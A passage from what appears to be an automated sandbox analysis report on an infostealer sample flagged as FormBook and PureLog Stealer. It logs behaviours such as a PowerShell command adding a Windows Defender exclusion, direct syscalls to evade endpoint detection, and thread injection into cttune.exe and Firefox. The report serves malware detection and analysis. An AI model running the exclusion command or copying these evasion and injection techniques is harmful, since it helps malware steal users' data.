                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730A5B mov eax, dword ptr fs:[00000030h]7_2_01730A5B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730A5B mov eax, dword ptr fs:[00000030h]7_2_01730A5B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01744A35 mov eax, dword ptr fs:[00000030h]7_2_01744A35
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01744A35 mov eax, dword ptr fs:[00000030h]7_2_01744A35
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175CA38 mov eax, dword ptr fs:[00000030h]7_2_0175CA38
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175CA24 mov eax, dword ptr fs:[00000030h]7_2_0175CA24
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174EA2E mov eax, dword ptr fs:[00000030h]7_2_0174EA2E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017ACA11 mov eax, dword ptr fs:[00000030h]7_2_017ACA11
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175AAEE mov eax, dword ptr fs:[00000030h]7_2_0175AAEE
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175AAEE mov eax, dword ptr fs:[00000030h]7_2_0175AAEE
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720AD0 mov eax, dword ptr fs:[00000030h]7_2_01720AD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01754AD0 mov eax, dword ptr fs:[00000030h]7_2_01754AD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01754AD0 mov eax, dword ptr fs:[00000030h]7_2_01754AD0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01776ACC mov eax, dword ptr fs:[00000030h]7_2_01776ACC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01776ACC mov eax, dword ptr fs:[00000030h]7_2_01776ACC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01776ACC mov eax, dword ptr fs:[00000030h]7_2_01776ACC
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728AA0 mov eax, dword ptr fs:[00000030h]7_2_01728AA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728AA0 mov eax, dword ptr fs:[00000030h]7_2_01728AA0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01776AA4 mov eax, dword ptr fs:[00000030h]7_2_01776AA4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01758A90 mov edx, dword ptr fs:[00000030h]7_2_01758A90
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172EA80 mov eax, dword ptr fs:[00000030h]7_2_0172EA80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4A80 mov eax, dword ptr fs:[00000030h]7_2_017F4A80
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B8D6B mov eax, dword ptr fs:[00000030h]7_2_017B8D6B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720D59 mov eax, dword ptr fs:[00000030h]7_2_01720D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720D59 mov eax, dword ptr fs:[00000030h]7_2_01720D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01720D59 mov eax, dword ptr fs:[00000030h]7_2_01720D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728D59 mov eax, dword ptr fs:[00000030h]7_2_01728D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728D59 mov eax, dword ptr fs:[00000030h]7_2_01728D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728D59 mov eax, dword ptr fs:[00000030h]7_2_01728D59
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: NULL target: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeSection loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cttune.exeThread register set: target process: 3568Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cttune.exeThread APC queued: target process: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeProcess created: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe"Jump to behavior
                Source: C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945871071.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2601034788.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601373900.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945871071.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2601034788.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601373900.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945871071.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2601034788.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601373900.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945871071.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2601034788.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601373900.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeQueries volume information: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2e935e0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.3119640.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.311b658.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.3118628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1417000725.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
